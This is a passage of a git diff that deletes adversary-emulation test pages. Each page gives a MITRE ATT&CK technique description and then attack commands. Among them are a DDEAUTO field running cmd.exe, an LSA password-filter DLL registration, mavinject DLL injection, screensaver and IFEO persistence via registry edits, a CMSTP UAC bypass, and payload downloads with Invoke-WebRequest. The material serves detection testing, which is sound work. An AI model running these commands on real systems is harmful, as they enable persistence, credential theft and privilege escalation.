-<blockquote>Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.
-
-Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)
-
-Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Execute Commands](#atomic-test-1---execute-commands)
-
-- [Atomic Test #2 - Execute PowerShell script via Word DDE](#atomic-test-2---execute-powershell-script-via-word-dde)
-
-
-<br/>
-
-## Atomic Test #1 - Execute Commands
-Executes commands via DDE using Microsfot Word
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Run it with these steps! 
-Open Microsoft Word
-
-Insert tab -> Quick Parts -> Field
-
-Choose = (Formula) and click ok.
-
-After that, you should see a Field inserted in the document with an error "!Unexpected End of Formula", right-click the Field, and choose Toggle Field Codes.
-
-The Field Code should now be displayed, change it to Contain the following:
-
-{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"  }
-
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Execute PowerShell script via Word DDE
-When the word document opens it will prompt the user to click ok on a dialogue box, then attempt to run PowerShell with DDEAUTO to download and execute a powershell script
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-start $PathToAtomicsFolder\T1173\bin\DDE_Document.docx
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1174.md b/Atomic_Threat_Coverage/Triggers/T1174.md
deleted file mode 100644
index b6ff4e1..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1174.md
+++ /dev/null
@@ -1,59 +0,0 @@
-# T1174 - Password Filter DLL
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1174)
-<blockquote>Windows password filters are password policy enforcement mechanisms for both domain and local accounts. Filters are implemented as dynamic link libraries (DLLs) containing a method to validate potential passwords against password policies. Filter DLLs can be positioned on local computers for local accounts and/or domain controllers for domain accounts.
-
-Before registering new passwords in the Security Accounts Manager (SAM), the Local Security Authority (LSA) requests validation from each registered filter. Any potential changes cannot take effect until every registered filter acknowledges validation.
-
-Adversaries can register malicious password filters to harvest credentials from local computers and/or entire domains. To perform proper validation, filters must receive plain-text credentials from the LSA. A malicious password filter would receive these plain-text credentials every time a password request is made. (Citation: Carnal Ownage Password Filters Sept 2013)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Install and Register Password Filter DLL](#atomic-test-1---install-and-register-password-filter-dll)
-
-
-<br/>
-
-## Atomic Test #1 - Install and Register Password Filter DLL
-Uses PowerShell to install and register a password filter DLL. Requires a reboot and administrative privileges.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| input_dll | Path to DLL to be installed and registered | Path | PathToAtomicsFolder&#92;T1174&#92;src&#92;AtomicPasswordFilter.dll|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-$passwordFilterName = (Copy-Item "#{input_dll}" -Destination "C:\Windows\System32" -PassThru).basename
-$lsaKey = Get-Item "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\"
-$notificationPackagesValues = $lsaKey.GetValue("Notification Packages")
-$notificationPackagesValues += $passwordFilterName
-Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\" "Notification Packages" $notificationPackagesValues
-Restart-Computer -Confirm
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: AtomicPasswordFilter.dll must exist on disk at specified location (#{input_dll})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{input_dll}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-Write-Host "You must provide your own password filter dll"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1176.md b/Atomic_Threat_Coverage/Triggers/T1176.md
deleted file mode 100644
index 8026679..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1176.md
+++ /dev/null
@@ -1,112 +0,0 @@
-# T1176 - Browser Extensions
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1176)
-<blockquote>Browser extensions or plugins are small programs that can add functionality and customize aspects of internet browsers. They can be installed directly or through a browser's app store. Extensions generally have access and permissions to everything that the browser can access. (Citation: Wikipedia Browser Extension) (Citation: Chrome Extensions Definition)
-
-Malicious extensions can be installed into a browser through malicious app store downloads masquerading as legitimate extensions, through social engineering, or by an adversary that has already compromised a system. Security can be limited on browser app stores so may not be difficult for malicious extensions to defeat automated scanners and be uploaded. (Citation: Malicious Chrome Extension Numbers) Once the extension is installed, it can browse to websites in the background, (Citation: Chrome Extension Crypto Miner) (Citation: ICEBRG Chrome Extensions) steal all information that a user enters into a browser, to include credentials, (Citation: Banker Google Chrome Extension Steals Creds) (Citation: Catch All Chrome Extension) and be used as an installer for a RAT for persistence. There have been instances of botnets using a persistent backdoor through malicious Chrome extensions. (Citation: Stantinko Botnet) There have also been similar examples of extensions being used for command & control  (Citation: Chrome Extension C2 Malware).</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Chrome (Developer Mode)](#atomic-test-1---chrome-developer-mode)
-
-- [Atomic Test #2 - Chrome (Chrome Web Store)](#atomic-test-2---chrome-chrome-web-store)
-
-- [Atomic Test #3 - Firefox](#atomic-test-3---firefox)
-
-- [Atomic Test #4 - Edge Chromium Addon - VPN](#atomic-test-4---edge-chromium-addon---vpn)
-
-
-<br/>
-
-## Atomic Test #1 - Chrome (Developer Mode)
-
-**Supported Platforms:** Linux, Windows, macOS
-
-
-
-
-#### Run it with these steps! 
-1. Navigate to [chrome://extensions](chrome://extensions) and
-tick 'Developer Mode'.
-
-2. Click 'Load unpacked extension...' and navigate to
-[Browser_Extension](../t1176/)
-
-3. Click 'Select'
-
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - Chrome (Chrome Web Store)
-
-**Supported Platforms:** Linux, Windows, macOS
-
-
-
-
-#### Run it with these steps! 
-1. Navigate to https://chrome.google.com/webstore/detail/minimum-viable-malicious/odlpfdolehmhciiebahbpnaopneicend
-in Chrome
-
-2. Click 'Add to Chrome'
-
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #3 - Firefox
-Create a file called test.wma, with the duration of 30 seconds
-
-**Supported Platforms:** Linux, Windows, macOS
-
-
-
-
-#### Run it with these steps! 
-1. Navigate to [about:debugging](about:debugging) and
-click "Load Temporary Add-on"
-
-2. Navigate to [manifest.json](./src/manifest.json)
-
-3. Then click 'Open'
-
-
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #4 - Edge Chromium Addon - VPN
-Adversaries may use VPN extensions in an attempt to hide traffic sent from a compromised host. This will install one (of many) available VPNS in the Edge add-on store.
-
-**Supported Platforms:** Windows, macOS
-
-
-
-
-#### Run it with these steps! 
-1. Navigate to https://microsoftedge.microsoft.com/addons/detail/fjnehcbecaggobjholekjijaaekbnlgj
-in Edge Chromium
-
-2. Click 'Get'
-
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1179.md b/Atomic_Threat_Coverage/Triggers/T1179.md
deleted file mode 100644
index aa2c823..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1179.md
+++ /dev/null
@@ -1,65 +0,0 @@
-# T1179 - Hooking
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1179)
-<blockquote>Windows processes often leverage application programming interface (API) functions to perform tasks that require reusable system resources. Windows API functions are typically stored in dynamic-link libraries (DLLs) as exported functions. 
-
-Hooking involves redirecting calls to these functions and can be implemented via:
-
-* **Hooks procedures**, which intercept and execute designated code in response to events such as messages, keystrokes, and mouse inputs. (Citation: Microsoft Hook Overview) (Citation: Endgame Process Injection July 2017)
-* **Import address table (IAT) hooking**, which use modifications to a process’s IAT, where pointers to imported API functions are stored. (Citation: Endgame Process Injection July 2017) (Citation: Adlice Software IAT Hooks Oct 2014) (Citation: MWRInfoSecurity Dynamic Hooking 2015)
-* **Inline hooking**, which overwrites the first bytes in an API function to redirect code flow. (Citation: Endgame Process Injection July 2017) (Citation: HighTech Bridge Inline Hooking Sept 2011) (Citation: MWRInfoSecurity Dynamic Hooking 2015)
-
-Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), adversaries may use hooking to load and execute malicious code within the context of another process, masking the execution while also allowing access to the process's memory and possibly elevated privileges. Installing hooking mechanisms may also provide Persistence via continuous invocation when the functions are called through normal use.
-
-Malicious hooking mechanisms may also capture API calls that include parameters that reveal user authentication credentials for Credential Access. (Citation: Microsoft TrojanSpy:Win32/Ursnif.gen!I Sept 2017)
-
-Hooking is commonly utilized by [Rootkit](https://attack.mitre.org/techniques/T1014)s to conceal files, processes, Registry keys, and other objects in order to hide malware and associated behaviors. (Citation: Symantec Windows Rootkits)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages](#atomic-test-1---hook-powershell-tls-encryptdecrypt-messages)
-
-
-<br/>
-
-## Atomic Test #1 - Hook PowerShell TLS Encrypt/Decrypt Messages
-Hooks functions in PowerShell to read TLS Communications
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| file_name | Dll To Inject | Path | PathToAtomicsFolder&#92;T1179&#92;bin&#92;T1179x64.dll|
-| server_name | TLS Server To Test Get Request | Url | https://www.example.com|
-
-
-#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
-
-
-```powershell
-mavinject $pid /INJECTRUNNING #{file_name}
-curl #{server_name}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: T1179x64.dll must exist on disk at specified location (#{file_name})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{file_name}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{file_name}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1179/bin/T1179x64.dll" -OutFile "#{file_name}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1180.md b/Atomic_Threat_Coverage/Triggers/T1180.md
deleted file mode 100644
index 374314c..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1180.md
+++ /dev/null
@@ -1,52 +0,0 @@
-# T1180 - Screensaver
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1180)
-<blockquote>Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in <code>C:\Windows\System32\</code>, and <code>C:\Windows\sysWOW64\</code> on 64-bit Windows systems, along with screensavers included with base Windows installations. 
-
-The following screensaver settings are stored in the Registry (<code>HKCU\Control Panel\Desktop\</code>) and could be manipulated to achieve persistence:
-
-* <code>SCRNSAVE.exe</code> - set to malicious PE path
-* <code>ScreenSaveActive</code> - set to '1' to enable the screensaver
-* <code>ScreenSaverIsSecure</code> - set to '0' to not require a password to unlock
-* <code>ScreenSaveTimeout</code> - sets user inactivity timeout before screensaver is executed
-
-Adversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Set Arbitrary Binary as Screensaver](#atomic-test-1---set-arbitrary-binary-as-screensaver)
-
-
-<br/>
-
-## Atomic Test #1 - Set Arbitrary Binary as Screensaver
-This test copies a binary into the Windows System32 folder and sets it as the screensaver so it will execute for persistence. Requires a reboot and logon.
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| input_binary | Executable binary to use in place of screensaver for persistence | path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-copy #{input_binary} "%SystemRoot%\System32\evilscreensaver.scr"
-reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
-reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaveTimeout /t REG_SZ /d 60 /f
-reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v ScreenSaverIsSecure /t REG_SZ /d 0 /f
-reg.exe add "HKEY_CURRENT_USER\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "%SystemRoot%\System32\evilscreensaver.scr" /f
-shutdown /r /t 0
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1183.md b/Atomic_Threat_Coverage/Triggers/T1183.md
deleted file mode 100644
index 08e3b4a..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1183.md
+++ /dev/null
@@ -1,97 +0,0 @@
-# T1183 - Image File Execution Options Injection
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1183)
-<blockquote>Image File Execution Options (IFEO) enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., “C:\dbg\ntsd.exe -g  notepad.exe”). (Citation: Microsoft Dev Blog IFEO Mar 2010)
-
-IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. (Citation: Microsoft GFlags Mar 2017) IFEOs are represented as <code>Debugger</code> values in the Registry under <code>HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable></code> where <code><executable></code> is the binary on which the debugger is attached. (Citation: Microsoft Dev Blog IFEO Mar 2010)
-
-IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018) Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IEFO and silent process exit Registry values in <code>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\</code>. (Citation: Microsoft Silent Process Exit NOV 2017) (Citation: Oddvar Moe IFEO APR 2018)
-
-An example where the evil.exe process is started when notepad.exe exits: (Citation: Oddvar Moe IFEO APR 2018)
-
-* <code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v GlobalFlag /t REG_DWORD /d 512</code>
-* <code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v ReportingMode /t REG_DWORD /d 1</code>
-* <code>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v MonitorProcess /d "C:\temp\evil.exe"</code>
-
-Similar to [Process Injection](https://attack.mitre.org/techniques/T1055), these values may be abused to obtain persistence and privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. (Citation: Endgame Process Injection July 2017) Installing IFEO mechanisms may also provide Persistence via continuous invocation.
-
-Malware may also use IFEO for Defense Evasion by registering invalid debuggers that redirect and effectively disable various system and security applications. (Citation: FSecure Hupigon) (Citation: Symantec Ushedix June 2008)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - IFEO Add Debugger](#atomic-test-1---ifeo-add-debugger)
-
-- [Atomic Test #2 - IFEO Global Flags](#atomic-test-2---ifeo-global-flags)
-
-
-<br/>
-
-## Atomic Test #1 - IFEO Add Debugger
-Leverage Global Flags Settings
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| target_binary | Binary To Attach To | Path | C:&#92;Windows&#92;System32&#92;calc.exe|
-| payload_binary | Binary To Execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
-```
-
-#### Cleanup Commands:
-```cmd
-reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /f >nul 2>&1
-```
-
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - IFEO Global Flags
-Leverage Global Flags Settings
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| target_binary | Binary To Attach To | Path | C:&#92;Windows&#92;System32&#92;notepad.exe|
-| payload_binary | Binary To Execute | Path | C:&#92;Windows&#92;System32&#92;cmd.exe|
-
-
-#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
-
-
-```cmd
-REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512
-REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1
-REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}"
-```
-
-#### Cleanup Commands:
-```cmd
-reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /f >nul 2>&1
-reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /f >nul 2>&1
-reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /f >nul 2>&1
-```
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1191.md b/Atomic_Threat_Coverage/Triggers/T1191.md
deleted file mode 100644
index 5964c96..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1191.md
+++ /dev/null
@@ -1,99 +0,0 @@
-# T1191 - CMSTP
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1191)
-<blockquote>The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
-
-Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1117) / ”Squiblydoo”, CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017)  and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other whitelisting defenses since CMSTP.exe is a legitimate, signed Microsoft application.
-
-CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1088) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - CMSTP Executing Remote Scriptlet](#atomic-test-1---cmstp-executing-remote-scriptlet)
-
-- [Atomic Test #2 - CMSTP Executing UAC Bypass](#atomic-test-2---cmstp-executing-uac-bypass)
-
-
-<br/>
-
-## Atomic Test #1 - CMSTP Executing Remote Scriptlet
-Adversaries may supply CMSTP.exe with INF files infected with malicious commands
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| inf_file_path | Path to the INF file | path | PathToAtomicsFolder&#92;T1191&#92;src&#92;T1191.inf|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-cmstp.exe /s #{inf_file_path}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: INF file must exist on disk at specified location (#{inf_file_path})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{inf_file_path}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{inf_file_path}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191.inf" -OutFile "#{inf_file_path}"
-```
-
-
-
-
-<br/>
-<br/>
-
-## Atomic Test #2 - CMSTP Executing UAC Bypass
-Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| inf_file_uac | Path to the INF file | path | PathToAtomicsFolder&#92;T1191&#92;src&#92;T1191_uacbypass.inf|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-cmstp.exe /s #{inf_file_uac} /au
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: INF file must exist on disk at specified location (#{inf_file_uac})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{inf_file_uac}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{inf_file_uac}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1191/src/T1191_uacbypass.inf" -OutFile "#{inf_file_uac}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1193.md b/Atomic_Threat_Coverage/Triggers/T1193.md
deleted file mode 100644
index 37c3919..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1193.md
+++ /dev/null
@@ -1,47 +0,0 @@
-# T1193 - Spearphishing Attachment
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1193)
-<blockquote>Spearphishing attachment is a specific variant of spearphishing. Spearphishing attachment is different from other forms of spearphishing in that it employs the use of malware attached to an email. All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon [User Execution](https://attack.mitre.org/techniques/T1204) to gain execution.
-
-There are many options for the attachment such as Microsoft Office documents, executables, PDFs, or archived files. Upon opening the attachment (and potentially clicking past protections), the adversary's payload exploits a vulnerability or directly executes on the user's system. The text of the spearphishing email usually tries to give a plausible reason why the file should be opened, and may explain how to bypass system protections in order to do so. The email may also contain instructions on how to decrypt an attachment, such as a zip file password, in order to evade email boundary defenses. Adversaries frequently manipulate file extensions and icons in order to make attached executables appear to be document files, or files exploiting one application appear to be a file for a different one.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Download Phishing Attachment - VBScript](#atomic-test-1---download-phishing-attachment---vbscript)
-
-
-<br/>
-
-## Atomic Test #1 - Download Phishing Attachment - VBScript
-The macro-enabled Excel file contains VBScript which opens your default web browser and opens it to [google.com](http://google.com).
-The below will successfully download the macro-enabled Excel file to the current location.
-
-**Supported Platforms:** Windows
-
-
-
-
-
-#### Attack Commands: Run with `powershell`! 
-
-
-```powershell
-if (-not(Test-Path HKLM:SOFTWARE\Classes\Excel.Application)){
-  return 'Please install Microsoft Excel before running this test.'
-}
-else{
-  $url = 'https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1193/bin/PhishingAttachment.xlsm'
-  $fileName = 'PhishingAttachment.xlsm'
-  New-Item -Type File -Force -Path $fileName | out-null
-  $wc = New-Object System.Net.WebClient
-  $wc.Encoding = [System.Text.Encoding]::UTF8
-  [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
-  ($wc.DownloadString("$url")) | Out-File $fileName
-}
-```
-
-
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1196.md b/Atomic_Threat_Coverage/Triggers/T1196.md
deleted file mode 100644
index f044ad9..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1196.md
+++ /dev/null
@@ -1,56 +0,0 @@
-# T1196 - Control Panel Items
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1196)
-<blockquote>Windows Control Panel items are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files, the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file. (Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013)
-
-For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel. (Citation: Microsoft Implementing CPL)
-
-Adversaries can use Control Panel items as execution payloads to execute arbitrary commands. Malicious Control Panel items can be delivered via [Spearphishing Attachment](https://attack.mitre.org/techniques/T1193) campaigns (Citation: TrendMicro CPL Malware Jan 2014) (Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware. (Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension whitelisting.</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Control Panel Items](#atomic-test-1---control-panel-items)
-
-
-<br/>
-
-## Atomic Test #1 - Control Panel Items
-This test simulates an adversary leveraging control.exe
-Upon execution calc.exe will be launched
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| cpl_file_path | path to cpl file | path | PathToAtomicsFolder&#92;T1196&#92;bin&#92;calc.cpl|
-
-
-#### Attack Commands: Run with `command_prompt`! 
-
-
-```cmd
-control.exe #{cpl_file_path}
-```
-
-
-
-
-#### Dependencies:  Run with `powershell`!
-##### Description: Cpl file must exist on disk at specified location (#{cpl_file_path})
-##### Check Prereq Commands:
-```powershell
-if (Test-Path #{cpl_file_path}) {exit 0} else {exit 1} 
-```
-##### Get Prereq Commands:
-```powershell
-New-Item -Type Directory (split-path #{cpl_file_path}) -ErrorAction ignore | Out-Null
-Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1196/bin/calc.cpl" -OutFile "#{cpl_file_path}"
-```
-
-
-
-
-<br/>
diff --git a/Atomic_Threat_Coverage/Triggers/T1197.md b/Atomic_Threat_Coverage/Triggers/T1197.md
deleted file mode 100644
index 6000f4a..0000000
--- a/Atomic_Threat_Coverage/Triggers/T1197.md
+++ /dev/null
@@ -1,129 +0,0 @@
-# T1197 - BITS Jobs
-## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1197)
-<blockquote>Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM). (Citation: Microsoft COM) (Citation: Microsoft BITS) BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks are implemented as BITS jobs, which contain a queue of one or more file operations.
-
-The interface to create and manage BITS jobs is accessible through [PowerShell](https://attack.mitre.org/techniques/T1086)  (Citation: Microsoft BITS) and the [BITSAdmin](https://attack.mitre.org/software/S0190) tool. (Citation: Microsoft BITSAdmin)
-
-Adversaries may abuse BITS to download, execute, and even clean up after running malicious code. BITS tasks are self-contained in the BITS job database, without new files or registry modifications, and often permitted by host firewalls. (Citation: CTU BITS Malware June 2016) (Citation: Mondok Windows PiggyBack BITS May 2007) (Citation: Symantec BITS May 2007) BITS enabled execution may also allow Persistence by creating long-standing jobs (the default maximum lifetime is 90 days and extendable) or invoking an arbitrary program when a job completes or errors (including after system reboots). (Citation: PaloAlto UBoatRAT Nov 2017) (Citation: CTU BITS Malware June 2016)
-
-BITS upload functionalities can also be used to perform [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). (Citation: CTU BITS Malware June 2016)</blockquote>
-
-## Atomic Tests
-
-- [Atomic Test #1 - Bitsadmin Download (cmd)](#atomic-test-1---bitsadmin-download-cmd)
-
-- [Atomic Test #2 - Bitsadmin Download (PowerShell)](#atomic-test-2---bitsadmin-download-powershell)
-
-- [Atomic Test #3 - Persist, Download, & Execute](#atomic-test-3---persist-download--execute)
-
-
-<br/>
-
-## Atomic Test #1 - Bitsadmin Download (cmd)
-This test simulates an adversary leveraging bitsadmin.exe to download
-and execute a payload
-
-**Supported Platforms:** Windows
-
-
-
-
-#### Inputs:
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
